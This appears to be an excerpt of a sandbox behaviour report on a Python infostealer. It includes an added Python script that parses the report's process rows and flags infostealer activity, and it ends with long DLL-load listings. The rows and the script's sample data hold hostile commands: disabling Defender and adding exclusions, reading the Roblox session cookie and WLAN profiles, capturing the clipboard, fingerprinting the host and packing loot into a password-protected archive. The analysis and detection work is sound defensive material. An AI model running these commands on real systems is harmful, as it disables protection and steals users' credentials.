              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
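The process-creation rows above are the raw material a detection engineer turns into rules: Defender is neutered (Add-MpPreference exclusions, Set-MpPreference -Disable*, MpCmdRun -RemoveDefinitions), credentials are harvested (netsh wlan show profile, the .ROBLOSECURITY registry value, Get-Clipboard), the host is fingerprinted over WMIC, and the loot is packed with rar.exe -hp into a password-protected archive under Temp. The Python below is an added example, not part of the Joe Sandbox report or of the Blank Grabber sample: it parses rows in the extracted format shown here (tolerating both "exeProcess created" fused text and a trailing "Jump to behavior" link), applies a small rule set keyed on the command lines that appear on this page, and rolls the hits up into tactics and a verdict. The rule names, tactic labels and verdict thresholds are this example's own choices, and the rows in SAMPLE_ROWS are copied from the table above; the encoded PowerShell payload is not shown in the report, so it is written as a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample: rows copied from the behaviour table above, in the
# extracted form. The -EncodedCommand argument is not visible in the report,
# so a placeholder stands in for it (assumption, not data from the page).
SAMPLE_ROWS = [
    r"""Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"Jump to behavior""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior""",
    r"""Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <omitted>""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName""",
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid""",
    r'''Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"''',
    r"""Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1""",
]

# One row = "Source: <parent image> Process created: <child image> <command line>".
# The child image is the shortest prefix ending in .exe/.com that is followed by
# whitespace or end of line, so "SecuriteInfo.com.Python..." is not cut at ".com".
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*Process created:\s*"
    r"(?P<image>.+?\.(?:exe|com))(?=\s|$)\s*(?P<cmdline>.*)$"
)

# (rule id, tactic, description, pattern over the child command line).
# Names and tactic buckets are this example's own; patterns come from the rows above.
RULES = [(rid, tactic, desc, re.compile(pat, re.I)) for rid, tactic, desc, pat in [
    ("defender_exclusion", "Defense Evasion", "Defender exclusion added", r"Add-MpPreference\b.*-ExclusionPath"),
    ("defender_disable", "Defense Evasion", "Defender protections switched off",
     r"Set-MpPreference\b.*-Disable(?:RealtimeMonitoring|IOAVProtection|ScriptScanning)"),
    ("defender_remove_defs", "Defense Evasion", "Defender signatures removed", r"MpCmdRun\.exe.*-RemoveDefinitions"),
    ("encoded_ps", "Execution", "Encoded PowerShell with policy bypass", r"-ExecutionPolicy\s+Bypass\b.*-EncodedCommand"),
    ("csc_temp", "Execution", "csc.exe compiling from user Temp", r"csc\.exe.*AppData\\Local\\Temp"),
    ("wlan_creds", "Credential Access", "WLAN profiles enumerated", r"netsh\s+wlan\s+show\s+profile"),
    ("roblox_cookie", "Credential Access", ".ROBLOSECURITY read from registry", r"\.ROBLOSECURITY\b"),
    ("clipboard", "Collection", "Clipboard captured", r"\bGet-Clipboard\b"),
    ("archive_staging", "Collection", "Password-protected rar archive built", r"\brar\.exe\b.*\sa\s.*-hp"),
    ("av_enum", "Discovery", "Installed AV products enumerated", r"SecurityCenter2.*AntivirusProduct"),
    ("hw_fingerprint", "Discovery", "Hardware/licence fingerprint collected",
     r"csproduct\s+get\s+uuid|PROCESSOR_IDENTIFIER|win32_VideoController|totalphysicalmemory|BackupProductKeyDefault"),
    ("startup_persist", "Persistence", "Payload placed in the Startup folder", r"Start Menu\\Programs\\StartUp\\"),
]]
RULE_TACTIC = {rid: tactic for rid, tactic, _d, _p in RULES}


def parse_row(row):
    """Strip the report's 'Jump to behavior' link and split a row into parent, child image and command line."""
    row = re.sub(r"Jump to behavior\s*$", "", row.strip())
    m = ROW_RE.match(row)
    if not m:
        return None
    return {"source": m["source"], "image": m["image"], "cmdline": m["cmdline"].strip()}


def classify(cmdline):
    """Return every rule id whose pattern matches the child command line."""
    return [rid for rid, _t, _d, pat in RULES if pat.search(cmdline)]


def analyze(rows):
    """Map rule id -> matching events; also return the events no rule covered."""
    hits, unmatched = defaultdict(list), []
    for row in rows:
        ev = parse_row(row)
        if ev is None:
            continue
        ids = classify(ev["cmdline"])
        if not ids:
            unmatched.append(ev)
        for rid in ids:
            hits[rid].append(ev)
    return hits, unmatched


def verdict(hits):
    """Evasion plus credential theft plus staging is the stealer shape; evasion alone is merely suspicious."""
    tactics = {RULE_TACTIC[rid] for rid in hits}
    if {"Defense Evasion", "Credential Access", "Collection"} <= tactics:
        return "infostealer-like"
    return "suspicious" if "Defense Evasion" in tactics else "unclassified"


if __name__ == "__main__":
    hits, unmatched = analyze(SAMPLE_ROWS)
    for rid, _t, desc, _p in RULES:
        if rid in hits:
            print(f"[{RULE_TACTIC[rid]}] {desc}: {len(hits[rid])} event(s)")
    print(f"unmatched: {len(unmatched)}, verdict: {verdict(hits)}")
```

The rules deliberately key on the child command line rather than on the parent, because every one of these actions is wrapped in `cmd.exe /c`; a rule that also required the sample's own image name as grandparent would miss the same grabber dropped under a different file name. Feeding the full table through `analyze` instead of the sample list only changes the counts, not the verdict.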
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: version.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: python3.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: libffi-8.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: sqlite3.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: libssl-1_1.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: avicap32.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: msvfw32.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: dciman32.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: winmmbase.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: mmdevapi.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: devobj.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: ksuser.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: avrt.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: audioses.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: powrprof.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: umpdc.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: midimap.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
